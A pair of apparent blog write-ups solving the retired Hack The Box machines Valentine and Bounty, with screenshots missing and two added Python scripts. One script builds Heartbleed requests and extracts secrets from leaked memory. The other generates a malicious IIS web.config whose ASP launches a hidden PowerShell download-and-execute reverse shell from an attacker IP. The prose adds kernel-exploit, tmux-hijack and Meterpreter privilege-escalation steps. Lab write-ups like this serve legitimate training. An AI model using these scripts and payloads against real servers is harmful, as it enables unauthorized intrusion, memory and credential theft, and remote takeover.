
Friday, March 22, 2019

Valentine


VALENTINE

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, which is a retired machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- Valentine's IP is 10.10.10.79:




- Scanning with Nmap:







- Browsing to port 80, the page shows an image very reminiscent of the Heartbleed logo:





- Same thing with HTTPS at port 443:





- There is a lot of information available about the Heartbleed vulnerability:

http://heartbleed.com/

https://en.wikipedia.org/wiki/Heartbleed


- Nmap's ssl-heartbleed script confirms that the HTTPS service is vulnerable to Heartbleed:





- Dirbusting Valentine's web server:





- Checking folder /encode:






- Checking folder /decode:




- Going to /dev:




- Reading notes.txt:




- Reading hype_key:





- Copying hype_key locally:





- hype_key is a hex dump (pairs of hexadecimal digits separated by spaces), so let's decode it back to bytes:




- The decoded file is a PEM-encoded RSA private key, and its header shows it is passphrase-protected. Copying it locally:




3 - EXPLOITATION

- Looking for an exploit for the Heartbleed vulnerability:







- Copying the Python script 32764.py to the working folder:





- Now, launching the script against Valentine's IP:








- The memory leaked in the server's heartbeat response includes a Base64-encoded string:








- Decoding the string we get the plain text string heartbleedbelievethehype:




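To make the two mechanics above concrete (the malformed heartbeat sent by 32764.py and what to do with the memory that comes back, plus the hex decoding of hype_key), here is an added Python example. It is not code from the original post nor from the exploit-db script: it builds the Heartbleed request, parses a heartbeat response record, scans leaked bytes for Base64 tokens that decode to printable text, and decodes a hex dump. The network part is deliberately left out so that it runs offline; the leaked buffer (field name, request path) is constructed here and is an assumption, not a capture from the box.

```python
import base64
import re
import string
import struct
from urllib.parse import unquote

# TLS record content type for heartbeat (RFC 6520) and the two heartbeat message types.
TLS_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2


def build_heartbeat_request(claimed_len=0x4000, version=(3, 2)):
    """Build the malformed heartbeat that triggers Heartbleed.

    The message claims `claimed_len` bytes of payload but carries none, so an
    unpatched OpenSSL copies `claimed_len` bytes of its own heap into the reply.
    With the defaults this is the 8-byte record 18 03 02 00 03 01 40 00.
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_len)  # type, payload_length, no payload
    header = struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body))
    return header + body


def build_heartbeat_response(leak, version=(3, 2)):
    """Test double: the record an unpatched server sends back, wrapping `leak`."""
    body = struct.pack("!BH", HB_RESPONSE, len(leak)) + leak
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def leaked_payload(record):
    """Return the payload of a heartbeat response record, or None if it is not one.

    A patched server silently drops the malformed request, so receiving any
    heartbeat response at all (carrying more than the zero bytes we sent) is
    the signal the Nmap script and the PoC use to flag the server as vulnerable.
    """
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, _vmaj, _vmin, rlen = struct.unpack("!BBBH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return None
    body = record[5:5 + rlen]
    if len(body) < 3:
        raise ValueError("truncated heartbeat message")
    hb_type, plen = struct.unpack("!BH", body[:3])
    if hb_type != HB_RESPONSE:
        return None
    return body[3:3 + plen]


def is_vulnerable(record, sent_len=0):
    payload = leaked_payload(record)
    return payload is not None and len(payload) > sent_len


_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64_secrets(leak):
    """Scan leaked memory for Base64 tokens that decode to printable ASCII text.

    Form bodies leaked from the server may be URL-encoded (%3D for '='), so the
    buffer is percent-decoded first. Tokens whose length is not a multiple of 4
    or that decode to binary junk are skipped.
    """
    text = unquote(leak.decode("latin-1"))  # latin-1 never fails on arbitrary bytes
    found = []
    for m in _B64_TOKEN.finditer(text):
        token = m.group(0)
        if len(token) % 4:
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded and all(c in string.printable for c in decoded):
            found.append(decoded.strip())
    return found


def decode_hex_key(hex_dump):
    """hype_key is a hex dump of a PEM file: drop whitespace and decode it."""
    return bytes.fromhex("".join(hex_dump.split())).decode("ascii")


# Constructed sample leak (assumption, not captured from the box): a fragment of
# a POST body whose form value is the Base64 string the post decodes.
SAMPLE_LEAK = (
    b"\x00" * 8
    + b"POST /decode.php HTTP/1.1\r\nHost: 10.10.10.79\r\n\r\n"
    + b"$text=" + base64.b64encode(b"heartbleedbelievethehype\n").replace(b"=", b"%3D")
    + b"\x00" * 8
)

if __name__ == "__main__":
    print(build_heartbeat_request().hex())
    reply = build_heartbeat_response(SAMPLE_LEAK)
    print("vulnerable:", is_vulnerable(reply))
    print("secrets:", extract_base64_secrets(leaked_payload(reply)))
```

In practice the hex-decoded key is still passphrase-protected (its PEM header carries Proc-Type: 4,ENCRYPTED), which is why the next step feeds the recovered string to openssl; remember that ssh refuses a private key file whose permissions are wider than 0600.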

- Going back to the encrypted key, let's see whether openssl can decrypt it when given the string heartbleedbelievethehype as the passphrase:




- The decrypted SSH private key:





- SSH-ing into Valentine as user hype with the decrypted key:





- The remote shell is low privileged:






4 - CAPTURING THE 1st FLAG

- Reading user.txt:




5 - PRIVILEGE ESCALATION

- Let's try two ways of escalating privileges:


5.1 - Kernel exploitation

- First, checking Operating System version and Kernel number:








- There are several local exploits for the 3.2 kernel, for instance this one:






- Downloading to Kali and transferring to Valentine:







- Compiling according to the instructions:







- The exploit adds a new root-level user, firefart, to /etc/passwd and prompts for the password to assign to it, for instance hello:







- Switching to the user firefart with the password hello we get a root shell. Kernel exploits of this kind can crash the target and leave a persistent root account behind, so restore the original /etc/passwd when finished:





5.2 - Tmux

- Reading the hidden file .bash_history there is a reference to a tmux command:








- Also, ps aux confirms that there is a tmux session running as root:




- Finally, just running the tmux command found in .bash_history attaches to that root session and we get a remote root shell. This only works because the socket file the command points at is accessible to user hype; a socket that is only readable by root would have made the session unreachable:








6 - CAPTURING THE 2nd FLAG

- Reading root.txt:











Thursday, March 21, 2019

Bounty


BOUNTY

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Bounty, which is a retired machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- Bounty's IP is 10.10.10.93:




- Scanning with Nmap, Bounty appears to be a Windows system with a web server running IIS 7.5 on port 80:






- Connecting to the web server:





- Dirbuster (using the file extensions aspx and asp, because the server runs IIS) discovers the file transfer.aspx and the folder /uploadedFiles:








- Checking transfer.aspx, it is a file uploader:




- The folder /uploadedFiles is forbidden (directory listing is disabled), so uploaded files have to be requested by name:






3 - EXPLOITATION

- web.config files store the settings of IIS 7 (and higher) for a folder, much like a .htaccess file in the Apache web server.

- A web.config file can be used to bypass the protections of a file uploader by embedding ASP code in it, instead of directly uploading ASP files, which in our case are blacklisted by extension.

- For further information:

https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/



- Let's try this web.config file to illustrate this technique, where the ASP code just adds 1 + 2:





- Uploading web.config succeeds, so the extension is not blacklisted:




- Requesting the uploaded web.config with the browser, the ASP code runs and, as expected, the number 3 is displayed on the screen:




- So a promising technique for exploiting the machine is to upload a payload wrapped in the web.config template through transfer.aspx and run it remotely by requesting it in the browser.

- For instance, let's copy locally this PowerShell reverse shell script, adapting the IP and port to our needs:

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#file-powershell_reverse_shell-ps1




- Inserting the reference to powershell_reverse_shell.ps1 into a new web.config:




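The two web.config variants above (the 1 + 2 probe and the one that launches the PowerShell reverse shell) share the same structure, so here is one added Python example that generates both and checks them before upload. It is not code from the original post or from the referenced blog; the handler mapping and request-filtering overrides follow the technique that blog describes, while the attacker IP, the script name and the function names are assumptions for this example. The check matters because an XML comment may not contain "--": a payload with a double dash would make IIS reject the whole web.config with an error instead of executing it.

```python
import xml.etree.ElementTree as ET

# Handler mapping and request-filtering relaxations: make IIS hand *.config files
# to asp.dll, and stop it from blocking the .config extension and the web.config
# hidden segment for this folder. The ASP sits in an XML comment after
# </configuration>, which the configuration system ignores but asp.dll executes.
# Response.Write("-"&"->") closes the HTML comment early so the output is visible.
WEB_CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Response.Write("-"&"->")
{asp_body}
Response.Write("<!-"&"-")
%>
-->
"""


def build_web_config(asp_body):
    """Embed VBScript ASP in a web.config that IIS will both apply and execute.

    XML comments may not contain "--", so such a body is refused here rather
    than producing a file that IIS rejects as malformed.
    """
    if "--" in asp_body:
        raise ValueError("ASP body must not contain '--' (would break the XML comment)")
    return WEB_CONFIG_TEMPLATE.format(asp_body=asp_body.strip())


def validate_web_config(cfg):
    """Parse the file as XML the way IIS will and confirm the two overrides
    are present. Returns the mapped handler path ("*.config")."""
    root = ET.fromstring(cfg.encode("utf-8"))
    handler = root.find("./system.webServer/handlers/add[@name='web_config']")
    ext = root.find(
        "./system.webServer/security/requestFiltering/fileExtensions/remove[@fileExtension='.config']"
    )
    if handler is None or ext is None:
        raise ValueError("missing handler mapping or request-filtering override")
    return handler.get("path")


# Harmless probe: the page shows 3 if the ASP code was executed.
PROBE_ASP = "Response.Write(1+2)"


def reverse_shell_asp(attacker_ip, script="powershell_reverse_shell.ps1"):
    """ASP that downloads and runs the PowerShell reverse shell served from the
    attacker's HTTP server. IP, port-less URL and script name are assumptions."""
    url = f"http://{attacker_ip}/{script}"
    cmd = (
        "cmd /c powershell -nop -w hidden -c "
        f"\"IEX(New-Object Net.WebClient).DownloadString('{url}')\""
    )
    vb = cmd.replace('"', '""')  # VBScript doubles quotes inside string literals
    return f'Set sh = CreateObject("WScript.Shell")\nsh.Exec("{vb}")'


if __name__ == "__main__":
    for name, body in (("probe", PROBE_ASP), ("shell", reverse_shell_asp("10.10.14.2"))):
        cfg = build_web_config(body)
        print(name, "maps", validate_web_config(cfg))
        with open(f"web.config.{name}", "w", encoding="utf-8") as fh:
            fh.write(cfg)
```

Upload the generated file as web.config through transfer.aspx, then request /uploadedFiles/web.config; with the probe variant the page must show 3 before swapping in the reverse-shell body.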

- Starting a simple HTTP server on port 80 to serve powershell_reverse_shell.ps1:




- Setting a Netcat listening session at port 7777: 




- Uploading web.config:




- Requesting the uploaded web.config in the browser:





- The result is a low-privileged remote shell:









4 - CAPTURING THE 1st FLAG

- Reading user.txt (listing the folder with Get-ChildItem -Force, since the flag is a hidden file):










5 - PRIVILEGE ESCALATION

- However, to escalate to SYSTEM we need something more capable than the previous shell.

- Creating a Meterpreter reverse shell payload, exploit.exe, with msfvenom:








- Transferring the exploit from Kali to Bounty:




- Setting a Meterpreter listening session:




- Running exploit.exe:




- The consequence is a Meterpreter session:









- Using a Metasploit post-exploitation module to look for a local privilege escalation exploit; among its suggestions is ms10_092_schelevator:




- Backgrounding the Meterpreter session, pointing the exploit at it and running it, we get a remote shell as the privileged user NT AUTHORITY\SYSTEM:









6 - CAPTURING THE 2nd FLAG

- Reading root.txt: